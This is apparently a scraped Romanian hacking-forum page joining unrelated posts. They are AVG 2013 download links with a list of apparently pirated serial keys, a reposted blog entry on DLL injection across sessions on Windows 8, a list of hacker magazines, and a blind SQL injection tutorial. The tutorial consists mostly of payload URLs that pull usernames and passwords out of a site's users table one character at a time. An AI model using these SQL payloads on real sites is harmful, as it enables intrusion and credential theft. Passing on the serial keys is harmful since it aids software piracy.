Leaderboard

Download: AVG Internet Security 2013 32-bit Trial http://aa-download.avg.com/filedir/inst/avg_isct_x86_all_2013_2667a5738.exe Download: AVG Internet Security 2013 64-bit Trial http://aa-download.avg.com/filedir/inst/avg_isct_x64_all_2013_2667a5738.exe seriale : 8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED 8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED 8MEH-RGM33-K474L-6FGRR-8QEFN-UEMBR-ACED 64bits 8MEH-R6BFE-HWUHF-DPNDA-VFUWX-2EMBR-ACED 8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED 8MEH-RFR8J-PTS8Q-92ATA-ORC6Q-JEMBR-ACED 8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED sursa : softexia.com edit//reupload! funcioneaza

[h=2]DLL Injection and Windows 8[/h]By Nagareshwar Talekar on Sep 7 2012 Recently while working on new version of RemoteDLL, I discovered interesting changes around DLL injection on Windows 8. Before I actually talk about new changes, here is little background story. CreateRemoteThread is most common method used for DLL injection. It used to work flawlessly till Windows XP. However since Vista, it changed the colors, mainly it could no more inject DLL across sessions. This was attributed to new ‘Session Separation’ feature introduced in Vista. To beat that limitation, we discovered new undocumented method NTCreateThread which could inject DLL across session boundaries on Vista/Win7. Now while testing RemoteDLL on Windows 8, I tried (halfheartedly) injecting DLL into process running in Session 0. And to my utter surprise it worked just like magic in old days. I tried again to make sure that I am not dreaming So it looks like M$ has put things back in order. The question arises whether CreateRemoteThread changes in Vista was done intently or accidentally. Because we could still use NTCreateThread with little risk. Quick analysis point us to other direction. CreateRemoteThread actually calls NTCreateThread somewhere down the layer. May be some extra checking code that was added in Vista actually caused CreateRemoteThread to exit. So it is possible that this extra code was for something else but it adversely blocked injection across sessions. Now Microsoft may have realized the problem and must have fixed it to work normally. On the other hand, CreateRemoteThread have legitimate uses and certainly some of its big customers may have made the noise To conclude, now CreateRemoteThread works well in Windows 8 across sessions (tested with consumer edition). However we still have to rely on NTCreateThread on Vista/Win7 for injection beyond session boundaries. Another notable change that I have observed is w.r.t Reference Count or Load Count for DLLs. Few years back, we have written research article ‘The covert way to find the Reference Count of DLL’ explaining about hidden/undocumented Load Count field in LDR_MODULE structure. struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_MODULE, *PLDR_MODULE; PEB within each process stores information on all Loaded DLLs in an linked list. Each dll in this list is represented by LDR_MODULE structure. One of the important but undocumented field here is ‘LoadCount’ (reference count of dll). This ‘Load Count’ plays an important role in deciding when the DLL has to be completely unloaded from the process. It is also useful in Removing Injected DLL from the running process. Even our tools, RemoteDLL and SpyDLLRemover use it while removing Malware DLLs from process. Here is the screenshot of RemoteDLL showing Load Count for all DLLs in selected process. As you see LoadCount for static DLL is set to -1 as usual but for dynamically loaded DLLs it is set to 6. So where the hell it has gone? It has to be somewhere as every process needs it. It is possible that LDR_MODULE structure may have changed or some of its fields may have altered or it is moved somewhere else altogether. We have to dig further. This is just the tip of iceberg, more reversing will reveal the real truths. And as I discover more, I will put it here. Meanwhile if you find any interesting things around it do share ! Sursa: DLL Injection and Windows 8 | SecurityXploded Blog

The Hacker News Magazine site : The Hacker News Magazine - IT Security Magazine ClubHACK Magazine site : ClubHACK Magazine download : All Issues | ClubHACK Magazine Phrack site : .:: Phrack Magazine ::. download : Index of /archives Datenschleuder site : Die Datenschleuder download : Die Datenschleuder :: Download PenTest Magazine site : Penetration testing magazine – information security solutions [paid] download : RESOURCES • CYBER GATES Information Security Consulting, Testing and Research Company ][akep [Rus] site : ?????? ?????, ????? ????, ?????? - ????? 2600: The Hacker Quarterly site : 2600 | General Information [paid] Hakin9 site : IT Security Magazine - Hakin9 www.hakin9.org [paid] HITB Quarterly Magazine HITB Quarterly Magazine download : HITB Quarterly Magazine (IN)SECURE Magazine download : (IN)SECURE Magazine Hacktivism The Hacker News Magazine - May 2012 Issue Welcome cyber space readers and internet junkies from around the world. May brings us into an in-depth look at our favorite topic: Hacktivism download : http://news.thehackernews.com/THN-May2012.pdf Our fearless leader, Mohit Kumar, founder of The Hacker News opens the discussion with a look at the meaning of Hackitivism and what it means for society today. Our regular writers, security specialist Pierluigi Paganini, and Mourad Ben Lakhousa bring us their perspective on this most interesting and thought provoking topic. As editor, I truly enjoyed Keith H. DeBus’s article on cyber war. I found myself wrapped up in excitement and worry as he takes us into the what’s and where’s of cyber war. Also, Dominque C Brack does an excellent job discussing the topic. Your executive editor, Patti Galle, brings you to question just what anonymous needs to look like in the future and don’t miss our fun pokes at current news. Thanks for your faithful readership and thanks to those who contribute in so many, many ways! Mohit Kumar, Editor-in-chief, The Hacker News Hack This Zine https://hackbloc.org/zine download : HackThisSite Mirror | HackThisZine aveti ce sa cititii:) pentru RsT daca nu e postat bine rog admini sa mute.. site : https://hackbloc.org/zine merita un like !

Un nou concept. sau

Blind SQLi Injection .Slacker 30 August 2012 Sa luam ca exemplu: http://www.site.com/news.php?id=5 http://www.site.com/news.php?id=5 and 1=1 <= unde 1=1 este adevarat http://www.site.com/news.php?id=5 and 1=2 <= unde 1=2 este fals 1. MySQL Pentru blind vom folosii substring. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 Inlocuim 4 cu 5 daca query-ul este adevarat. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 2. Subselect Cand nu functioneaza vom folosii subselect. http://www.site.com/news.php?id=5 and (select 1)=1 Acum vom vedea daca avem acces la mysql.user http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 Daca pagina se incarca in mod normal, avem acces la mysql.user 3. Verificarea numelui tabelelor si coloanelor http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (cu limit 0,1 query-ul rezulta un rand de date din cauza subselect-ului. Daca pagina se incarca in mod normal, fara continut lipsa, exista. Daca avem FALSE lipsete un articol schimbam doar numele tabelului pana cand il ghicim. Sa zicem ca numele tabelului cu utilizatori este users. Acum avem nevoie de numele coloanei. http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Daca pagina se incarca in mod normal, inseamna ca numele coloanei este Password. Avem o coloana cu parola. 4. Extragerea datelor din baza de date Daca am gasit tabelul cu utilizatori si coloana, parola si numele de utilizator, vom extragere caracterele din lista. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Convertim caracterul 1 in valoare ASCII ( ASCII() ) Vom incerca sa ajungem la FALSE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 Am ajuns la TRUE si trebuie sa pastram incrementarea. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 Avem TRUE din nou. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Acum avem FALSE. Primul caracter din USERNAME este char(99) Convertim in ASCII: char(99) este scris 'c'. Sa verificam al doilea caracter: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Am schimbat ,1,1 in ,2,1 pentru a obtine al doilea caracter. Acum ne intorcem la caracterul 1: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Pagina ar trebuii sa se incarce in mod normal deci este TRUE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 Este fals si reducem numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 Este adevarat si ridicam numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 Fals. Deci al doilea caracter este char(105) si este 'i', si avem 'ci' in masura atunci ca incrementam pana la sfarsit atunci cand >0 returneaza fals (FALSE) stim ca ajungem la final. Sper ca am ajutat cu acest tutorial